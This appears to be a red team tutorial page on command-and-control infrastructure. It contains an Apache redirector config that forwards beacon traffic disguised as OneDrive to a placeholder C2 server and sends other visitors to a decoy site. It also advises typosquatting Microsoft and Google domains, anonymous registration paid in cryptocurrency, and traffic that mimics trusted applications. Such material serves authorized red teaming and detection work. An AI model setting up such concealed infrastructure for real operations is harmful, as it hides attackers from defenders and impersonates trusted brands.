Red Team Infrastructure

Setup

Professional red team infrastructure includes multiple layers of obfuscation, redundancy, and attribution resistance. Never point beacons directly at your C2 server—use redirectors, domain fronting, and dynamic DNS.

Infrastructure Architecture

infrastructure-diagram.txt
text 
Victim → Redirector → C2 Server → Team Server

┌─────────┐     ┌────────────┐     ┌──────────┐     ┌────────────┐
│ Beacon  │────▶│ Redirector │────▶│ C2 Server│────▶│ Team Server│
│ (Target)│     │ (Apache)   │     │ (Covenant)    │ (Operators)│
└─────────┘     └────────────┘     └──────────┘     └────────────┘

                 ┌────▼─────┐             
                 │ CloudFlare│             
                 │  CDN      │             
                 └───────────┘             

**Why Multiple Layers?**
- Redirector burns if detected, C2 server stays hidden
- Domain fronting hides true destination
- Team server never exposed to internet

Setting Up Redirectors

apache-redirector.conf
bash 
# Apache redirector with mod_rewrite
# Forwards legitimate traffic to C2, sends everything else to benign site

<VirtualHost *:443>
    ServerName legit-looking-domain.com
    
    SSLEngine On
    SSLCertificateFile /etc/letsencrypt/live/legit-looking-domain.com/fullchain.pem
    SSLCertificateKeyFile /etc/letsencrypt/live/legit-looking-domain.com/privkey.pem
    
    # Enable mod_rewrite
    RewriteEngine On
    
    # Only forward traffic with specific User-Agent (your beacon)
    RewriteCond %{HTTP_USER_AGENT} "^Mozilla/5\.0.*OneDriveSync.*"
    RewriteRule ^/(.*)$ https://C2-SERVER-IP/$1 [P,L]
    
    # All other traffic goes to legitimate website (cover)
    RewriteRule ^/(.*)$ https://google.com/$1 [R=302,L]
</VirtualHost>

# Install and configure
sudo a2enmod rewrite ssl proxy proxy_http
sudo systemctl restart apache2

# Test redirector
curl -A "Mozilla/5.0 OneDriveSync" https://legit-looking-domain.com
# Should hit C2

curl https://legit-looking-domain.com
# Should redirect to Google

Domain Acquisition Best Practices

  • Categorization: Register domains weeks in advance, browse benign content to build reputation
  • Aged Domains: Purchase expired domains with existing trust (NameCheap, GoDaddy auctions)
  • Typosquatting: Register common misspellings of legitimate domains (mircosoft.com, gooogle.com)
  • Privacy Protection: Use WHOIS privacy, cryptocurrency payments, and foreign registrars
  • TLS Certificates: Always use Let's Encrypt for HTTPS—unencrypted C2 is suspicious

Use Cobalt Strike Malleable Profiles

Customize C2 traffic to mimic legitimate applications like OneDrive, Microsoft Updates, or Google Analytics. Malleable profiles let you define HTTP headers, URI patterns, and even SSL certificates.

C2 Frameworks Comparison

Framework Cost Best For
Cobalt Strike $5,000/year Enterprise engagements, malleable profiles
Covenant Free (open-source) .NET-based operations, PowerShell heavy
Mythic Free (open-source) Cross-platform, modular agents
Sliver Free (open-source) Go-based, modern alternative to Cobalt Strike

Related Topics

Covert Operations

C2 Infrastructure

Initial Access